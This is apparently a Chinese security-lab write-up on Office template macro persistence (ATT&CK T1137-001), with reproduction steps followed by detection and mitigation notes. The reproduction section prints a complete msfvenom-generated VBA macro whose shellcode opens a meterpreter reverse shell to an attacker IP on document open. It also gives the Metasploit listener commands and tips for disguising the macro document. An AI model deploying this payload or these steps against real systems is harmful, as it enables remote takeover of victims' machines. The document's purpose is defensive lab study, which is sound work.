0x01 基础信息
| 具体信息 | 详情 |
|---|---|
| ATT&CK编号 | T1137-001 |
| 所属战术阶段 | 坚持 |
| 操作系统 | windows10 |
| 创建时间 | 2023年3月9日 |
| 监测平台 | 火绒安全、sysmon |
| 编写人员 | 暗魂攻防实验室网空对抗中心-G4br1el |
0x02 技术原理
攻击者可能会滥用 Microsoft Office 模板以在受感染的系统上获得持久性。Microsoft Office 包含属于常见 Office 应用程序的一部分并用于自定义样式的模板。每次启动应用程序时都会使用应用程序中的基本模板。
Office Visual Basic for Applications (VBA) 宏可以插入到基本模板中,并用于在相应的 Office 应用程序启动时执行代码以获得持久性。发现并发布了 Word 和 Excel 的示例。默认情况下,Word 创建了一个 Normal.dotm 模板,可以对其进行修改以包含恶意宏。Excel 没有默认创建的模板文件,但可以添加一个将自动加载的模板文件。共享模板也可以从远程位置存储和提取。
Word Normal.dotm 位置:C:Users<username>AppDataRoamingMicrosoftTemplatesNormal.dotm
Excel Personal.xlsb 位置:C:Users<username>AppDataRoamingMicrosoftExcelXLSTARTPERSONAL.XLSB
攻击者还可以通过劫持应用程序的搜索顺序来更改基本模板的位置以指向他们自己的位置,例如 Word 2016 将首先在 下查找 Normal.dotm,或通过修改 GlobalDotNameC:Program Files (x86)Microsoft OfficerootOffice16注册表项。通过修改 GlobalDotName 注册表项,对手可以指定任意位置、文件名和文件扩展名,以用于将在应用程序启动时加载的模板。要滥用 GlobalDotName,对手可能首先需要将模板注册为受信任的文档或将其放置在受信任的位置。
对手可能需要启用宏以不受限制地执行,具体取决于系统或企业关于使用宏的安全策略。
0x03 复现环境
| 工具列表 | 相关链接 |
|---|---|
| sysmon日志记录工具 | https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
| sysmon默认规则文件 | https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml |
| sysmon安装命令 | sysmon64.exe -accepteula -i sysmonconfig-export.xml |
| 实验命令 | 略 |
0×04 复现过程
本次实验采用msf反弹shell的方式进行。首先先创建一个VBA负载
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.134 LPORT=1234 -f vba > shell.vba
#If Vba7 ThenPrivate Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Xrtzt As Long, ByVal Shuodif As Long, ByVal Hhtjfo As LongPtr, Dcvz As Long, ByVal Cgejj As Long, Eiaj As Long) As LongPtrPrivate Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Vvxx As Long, ByVal Vfpcjidrq As Long, ByVal Ugwbkea As Long, ByVal Ausacdsg As Long) As LongPtrPrivate Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ruyern As LongPtr, ByRef Pyazd As Any, ByVal Iakpsfmke As Long) As LongPtr#ElsePrivate Declare Function CreateThread Lib "kernel32" (ByVal Xrtzt As Long, ByVal Shuodif As Long, ByVal Hhtjfo As Long, Dcvz As Long, ByVal Cgejj As Long, Eiaj As Long) As LongPrivate Declare Function VirtualAlloc Lib "kernel32" (ByVal Vvxx As Long, ByVal Vfpcjidrq As Long, ByVal Ugwbkea As Long, ByVal Ausacdsg As Long) As LongPrivate Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ruyern As Long, ByRef Pyazd As Any, ByVal Iakpsfmke As Long) As Long#EndIf
Sub Auto_Open()
Dim Hqquslzs As Long, Ngahonc As Variant, Rzooise As Long
#If Vba7 Then
Dim Bfarl As LongPtr, Bvj As LongPtr
#Else
Dim Bfarl As Long, Bvj As Long
#EndIf
Ngahonc = Array(252,72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101,72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,77,49,201,72,15,183,74,74,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1,193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24, _
11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72,1,208,80,139,72,24,68,139,64,32,73,1,208,227,86,77,49,201,72,255,201,65,139,52,136,72,1,214,72,49,192,172,65,193,201,13,65,1,193,56,224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1, _
208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,65,88,65,88,72,1,208,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255,224,88,65,89,90,72,139,18,233,75,255,255,255,93,73,190,119,115,50,95,51,50,0,0,65,86,73,137,230,72,129,236,160,1,0,0,73,137,229,73, _
188,2,0,4,210,192,168,44,134,65,84,73,137,228,76,137,241,65,186,76,119,38,7,255,213,76,137,234,104,1,1,0,0,89,65,186,41,128,107,0,255,213,106,10,65,94,80,80,77,49,201,77,49,192,72,255,192,72,137,194,72,255,192,72,137,193,65,186,234,15,223,224,255,213,72,137,199,106,16,65, _
88,76,137,226,72,137,249,65,186,153,165,116,97,255,213,133,192,116,10,73,255,206,117,229,232,147,0,0,0,72,131,236,16,72,137,226,77,49,201,106,4,65,88,72,137,249,65,186,2,217,200,95,255,213,131,248,0,126,85,72,131,196,32,94,137,246,106,64,65,89,104,0,16,0,0,65,88,72,137,242, _
72,49,201,65,186,88,164,83,229,255,213,72,137,195,73,137,199,77,49,201,73,137,240,72,137,218,72,137,249,65,186,2,217,200,95,255,213,131,248,0,125,40,88,65,87,89,104,0,64,0,0,65,88,106,0,90,65,186,11,47,15,48,255,213,87,89,65,186,117,110,77,97,255,213,73,255,206,233,60,255, _
255,255,72,1,195,72,41,198,72,133,246,117,180,65,255,231,88,106,0,89,73,199,194,240,181,162,86,255,213)
Bfarl = VirtualAlloc(0, UBound(Ngahonc), &H1000, &H40)
For Rzooise = LBound(Ngahonc) To UBound(Ngahonc)
Hqquslzs = Ngahonc(Rzooise)
Bvj = RtlMoveMemory(Bfarl + Rzooise, Hqquslzs, 1)
Next Rzooise
Bvj = CreateThread(0, 0, Bfarl, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
2. 新建一个包含宏的docx文档
把msf生成的shellcode复制到vba文件中,记住先清空一下里面的内容
然后设置一下宏文件属性
保存后另存为启用宏的docm文件
可以看到两种文档对比,接着把docm后缀改为doc显示为正常文档。本来是想做个免杀的,不过用EvilClippy啥的试过了没用,本实验重点也不是免杀。宏加密可以躲过静态免杀,运行之后立马就拦截了。还要注意的就是制作完定稿后先不要打开进行测试,测试后再上传到目标主机,是会被自动清理宏文件的。
3. 然后开启监听
msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.44.134lhost => 192.168.44.134msf6 exploit(multi/handler) > set lport 1234lport => 1234msf6 exploit(multi/handler) > exploit
上传文档至目标主机,模拟用户双击打开后反弹shell
0×05 检测方法
-
日志特征
双击文档时,进程WINWORD.EXE打开该文档
![ATT&CK实验-T1137-001-办公应用启动-office模板宏]( "ATT&CK实验-T1137-001-办公应用启动-office模板宏")
然后该程序通过TCP协议连接攻击机
![ATT&CK实验-T1137-001-办公应用启动-office模板宏]( "ATT&CK实验-T1137-001-办公应用启动-office模板宏")
-
攻击特征
运行该宏时,会被火绒查杀
宏路径加载位置:C:UsersAdministratorAppDataRoamingMicrosoftTemplatesNormal.dotm
0×06 处置方法与规则编写
-
处置方法:
- 在 Windows 10 上,启用攻击面减少 (ASR) 规则以防止 Office 应用程序创建子进程并将潜在的恶意可执行内容写入磁盘。
- 禁用 Office 加载项。如果需要它们,请遵循最佳做法来保护它们,方法是要求对它们进行签名并禁用允许加载项的用户通知。对于某些加载项类型(WLL、VBA),可能需要额外的缓解措施,因为在 Office 信任中心禁用加载项不会禁用 WLL,也不会阻止 VBA 代码的执行
火绒监测规则编写:火绒已自带相关规则库。
0×07 总结
通过本次实验可知,在安装office后,默认是启用宏的,这时候就可以使用宏病毒去进行权限维持。当然通过安装终端防护软件,可以对宏进行查杀,因此对宏的免杀还需要深入研究。ps:本人在今年会继续对ATT&CK进行落地实验,有兴趣一起做的小伙伴可以联系微信号:charlesG4br1el。本人也在做工控安全项目,有很多需要请教的地方,有做工控的小伙伴可以私聊我哈!
原文始发于微信公众号(暗魂攻防实验室):ATT&CK实验-T1137-001-办公应用启动-office模板宏
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论